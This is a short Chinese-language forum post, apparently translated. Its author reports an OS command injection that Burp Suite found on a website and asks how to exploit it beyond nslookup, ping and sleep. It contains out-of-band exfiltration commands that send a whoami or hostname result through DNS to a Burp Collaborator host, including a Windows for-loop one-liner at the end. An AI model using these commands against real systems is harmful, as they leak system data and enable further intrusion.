带外数据泄露命令注入

几天前，我通过 burp suite 扫描仪使用 nslookup xxx.burpcolaborator.com 漏洞在感兴趣的网站中发现了一个漏洞，具有以下功能

问题：操作系统命令注入 严重性：高 信心：一定

该漏洞仅在使用 ` 时响应，并且仅响应 nslookup、sleep 和 ping（包括 burp 协作者）。

这些是它响应的唯一命令。

nslookup xxx.burpcolaborator.com

ping xxx.burpcolaborator.com

sleep 10

其他命令，如

nslookup $(whoami).xxx.burp collaborator.com

，他们没有给出任何答案，如果您能帮助我解决这个问题，我将不胜感激，因为我找不到利用此漏洞的方法，并且我希望它执行除 nslookup 或 sleep 之外的其他命令.

我等待您的回复。 谢谢

for /f %i in ('hostname') do ping %i.burpid.burpcolaborator.com